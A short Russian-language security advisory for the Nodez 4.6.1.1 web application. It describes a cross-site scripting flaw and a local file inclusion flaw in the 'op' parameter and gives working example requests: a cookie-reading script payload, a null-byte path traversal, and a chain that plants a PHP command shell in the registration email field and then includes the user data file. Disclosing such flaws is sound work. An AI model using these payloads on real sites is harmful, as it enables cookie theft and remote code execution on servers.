Программа: Nodez 4.6.1.1, возможно более ранние версии.

Уязвимость позволяет удаленному пользователю произвести XSS нападение и
выполнить произвольный PHP сценарий на целевой системе.

1. Уязвимость существует из-за недостаточной обработки входных данных в
параметре "op". Удаленный пользователь может с помощью специально
сформированного запроса выполнить произвольный код сценария в браузере жертвы в
контексте безопасности уязвимого сайта.

Пример:

http://localhost/nodez/?node=system&op=block<script>alert(document.cookie)</script>&block=3&bop=more

2. Уязвимость существует из-за недостаточной обработки входных данных в
параметре "op". Удаленный пользователь может подключить и выполнить произвольные
локальные файлы на системе. Дальнейшая эксплуатация уязвимости возможна путем
записи PHP код в файл "list.gtdat", который хранит данные о зарегистрированных
пользователях.

Пример:

http://localhost/nodez/?node=system&op=/../../../[SHELL]%00&cmd=dir

Пример:

register an account :
username:hamid
password:hamidnetworksecurityteam
email: PHP code like (PHP Code Injection) :
<?system ($_GET[‘cmd’]);?>
and then use local file inclusion :
http://localhost/nodez/?node=system&op=/../../cache/users/list.gtdat%00&cmd=dir



Оставить мнение